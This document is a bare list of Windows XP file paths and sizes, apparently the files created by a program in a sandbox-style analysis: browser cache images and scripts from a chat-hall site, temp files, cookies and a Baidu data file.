    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\鲜花[1].gif (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\190179s[1].jpg (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\190256_20131230171616[1].jpg (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\160236_m[1].jpg (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\190208_20120514134911[1].jpg (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\120312_20140114132145[1].jpg (2156 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\VGXF.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\h[2].js (1691 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777198_20151008201005109_255[1].jpg (8180 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\icon_default[1].png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\777116_20150822141030265_255[2].jpg (3656 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\777073_20141217193405703_255[2].jpg (2696 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\8158603_20150810100123875_255[1].jpg (5392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\200666_m[1].jpg (1340 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\120040_m[1].jpg (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\180018_723723_20151013145141_n[1].jpg (2696 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777073_20141217193405703_255[1].jpg (2699 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\gift20[1].png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\8158261_20150413013730468_255[1].jpg (3656 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\VGXC.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\icon_room[1].png (751 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\btn_room[1].png (747 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\8158139_20150421010732765_255[1].jpg (2696 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\getad4[2].htm (276 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\140263_m[1].jpg (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\duihuandoudou20141217_n[1].jpg (3656 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\580275_20150911195526265_255[1].jpg (3126 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\9158058_20150107044030437_255[1].jpg (2569 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777159_20150523182929109_255[1].jpg (5784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\people1[2].png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\200296_20111031001753[1].jpg (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\580275_20150911195526265_255[2].jpg (2696 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\180102_20150903095300[1].jpg (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\VGXB.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\777116_20150822141030265_255[1].jpg (4368 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\777198_20151008201005109_255[1].jpg (5418 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\VGXA.tmp (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\9158767_20140807120443359_255[1].jpg (3970 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\VGX13.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\icon_play1[1].png (1491 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\180109_m[1].jpg (1340 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\190149s[1].jpg (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\9158811_20150609183123000_255[1].jpg (4706 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\8158013_20150805211018765_255[1].jpg (2696 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\mm_22[1].png (2641 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\200288_m[1].jpg (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\190188_20150723170630[1].jpg (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\base[1].js (10921 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\130088_20120131202656[1].jpg (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\190116_m[1].jpg (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\580191_20150812230520093_255[1].jpg (3668 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\777073_20141217193405703_255[1].jpg (2696 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\190128_m[1].jpg (1340 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\150013_20120703124557[1].jpg (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\150051_20120504162134[1].jpg (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777045_20141127144331328_255[1].jpg (5392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\close[1].png (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Internet Explorer\MSIMGSIZ.DAT (192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777145_20150827182932546_255[2].jpg (2696 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\580296_20140829233637328_255[1].jpg (2263 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\580585_20150915032829765_255[1].jpg (2923 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\140212_m[1].jpg (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\core[1].php (73 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\777198_20151008201005109_255[1].jpg (3656 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\blank[1].gif (49 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\180109_20150209152745[1].jpg (2013 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\580780_20150609184158187_255[1].jpg (2795 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\dot1[1].png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\9158279_20150505030307609_255[1].jpg (2696 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\clock_k[1].htm (1196 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\city_bottom[1].png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\head_bg[1].png (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\in_user_roomin[1].htm (1121 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\icon_default[1].png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\170029_20111122145248[1].jpg (3 bytes)
    %Documents and Settings%\%current user%\UserData\2Z89WTQV\room.9158[1].xml (266 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\120051_20130716185754[1].jpg (2743 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\777045_20141127144331328_255[1].jpg (6025 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\flashpopup[1].js (457 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\icon_play1[2].png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\190188_m[1].jpg (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\100093_580271_20140807153629843[1].jpg (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\580726_20151010123808687_255[1].jpg (3900 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\20150914182303281_n[1].jpg (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\6666002_20140805002355875_255[1].jpg (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\icon_room[1].png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\award[1].jpg (10268 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\reset[1].css (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\stat[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\ad1_balck[1].png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\8158523_20150617194246906_255[1].jpg (2696 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@9158[1].txt (173 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\icon_play1[1].png (797 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\200666_20150612165639[1].jpg (2569 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\170131_m[1].jpg (594 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\150161_m[1].jpg (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\180102_m[1].jpg (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\130155_m[1].jpg (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\3_3[1].gif (1 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (718 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\index[1].css (15375 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\people1[1].png (1392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\150085_20150503121748[1].jpg (776 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\cut[1].png (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\190256_m[1].jpg (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\150002_20140419000110[1].jpg (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\9157345_20140809011505875_255[1].jpg (3042 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\people1[1].png (1392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777145_20150827182932546_255[1].jpg (2963 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\170159_m[1].jpg (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777202_20150731172643031_255[1].jpg (3804 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\777190_20150513200601968_255[1].jpg (6382 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\200288_20140306184735[1].jpg (776 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\getad4[1].htm (891 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\180333_20140429150028[1].jpg (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\7158159_20141127041710437_255[1].jpg (2696 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\8158603_20150810100123875_255[1].jpg (5567 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\8158827_20150730191002109_255[1].jpg (2696 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\777116_20150822141030265_255[1].jpg (3656 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\140263_20130923154112[1].jpg (2641 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\150077_20150825172310[1].jpg (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\HallIndex[1].js (18093 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\100007_20111230175804[1].jpg (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\XYMarquee[1].js (457 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\cut[1].png (776 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\btn_room[1].png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\ad1_balck[1].png (1667 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\ce0956f9-0e5f-492a-ba99-59efa187cc72[1].jpg (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\130184_222999_20151012145103_n[1].jpg (4122 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\120378_20140915162837[1].jpg (1004 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\130065_m[1].jpg (209 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\100005_20111228131700[1].jpg (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\120058_20110117133849[1].jpg (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\190354_20130604150927[1].jpg (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\580296_20140829233637328_255[1].jpg (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\130155_20141106140816[1].jpg (2156 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\150022_20150910162509[1].jpg (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\180111_m[1].jpg (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777198_20151008201005109_255[2].jpg (3656 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\130088_777083_20140804204648468[1].jpg (4406 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\190179_9158735_20150112194135625[1].jpg (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\fshoulie201542_n[1].jpg (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\VGXD.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\180128_20150704052508[1].jpg (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\21[1].gif (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\190177_m[1].jpg (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\180004_m[1].jpg (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\150012_20110718140241[1].jpg (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\130188_m[1].jpg (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\8158724_20150911031309265_255[1].jpg (2696 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\9158269_20150221201553296_255[1].jpg (2696 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\8158584_20150414145802593_255[1].jpg (2166 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\130262_20140116154840[1].jpg (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\170131_20141016173134[1].jpg (2640 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\9157426_20150921145913046_255[1].jpg (2696 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\blockUI[1].js (4585 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\reset[1].css (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\777145_20150827182932546_255[2].jpg (3167 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\rom_k_2[1].jpg (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\getad4[1].htm (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\777116_20150822141030265_255[1].jpg (4368 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\222[1].png (5096 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\hall[1].htm (915 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\integrate_hall[1].htm (5882 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\93223146-035d-4264-80a6-857e69f47a69[1].jpg (54716 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\af090531-6168-425f-9052-0ca3f993dc90[1].jpg (4152 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\140098_m[1].jpg (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\580296_20140829233637328_255[1].jpg (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\150161_20140627141901[1].jpg (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\140098_20131104162402[1].jpg (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\100180_580151_20140926150329546[1].jpg (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\icon_room[2].png (822 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\8158530_20150811141519171_255[1].jpg (3656 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\rom_k_6[1].jpg (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\100102_20150119212159[1].jpg (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\9158596_20150623231453312_255[1].jpg (2996 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\8158830_20150731015152343_255[1].jpg (3029 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\120312_m[1].jpg (7 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (132 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\777198_20151008201005109_255[1].jpg (8196 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\香水[1].gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\rom_k_2[1].jpg (2 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][2].txt (471 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\777145_20150827182932546_255[1].jpg (3423 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\150188_20121121150649[1].jpg (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\580123_20150505204953500_255[1].jpg (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\140212_20150612172425[1].jpg (776 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\100076_20120504165605[1].jpg (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\777029_20151005194452656_140[1].jpg (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\base[1].js (11399 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\btn_bg[1].png (647 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\weblog[1].htm (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\580915_20150512023501984_140[1].jpg (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\VGX16.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\fillet3[1].gif (317 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\serial1[1].gif (362 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\view[2].htm (906 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\mini_index[1].htm (2634 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\fillet_top[1].gif (259 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\bnt[1].gif (732 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\bnt[1].gif (1464 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\getad4[1].htm (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\fillet2[1].gif (112 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\mm_h[1].png (776 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\VGX14.tmp (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\荧光棒[1].gif (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\VGX17.tmp (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\VGX15.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\10_3[1].gif (269 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\serial1[1].gif (724 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\serial1[1].gif (724 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\serial1[1].gif (1086 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\loading[1].gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\580956_20150823101235890_140[1].jpg (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\jquery[1].js (23479 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@9158[2].txt (336 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\mini_index[1].js (4153 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\xuxian[1].gif (50 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\VGX18.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\bnt[2].gif (732 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\20150914182303281[1].jpg (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\580111_20150617204039546_140[1].jpg (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\bnt2[1].gif (269 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\Common\Global.db (100 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\icons[1].gif (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\xui[1].js (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\CALW8FHP.htm (1 bytes)
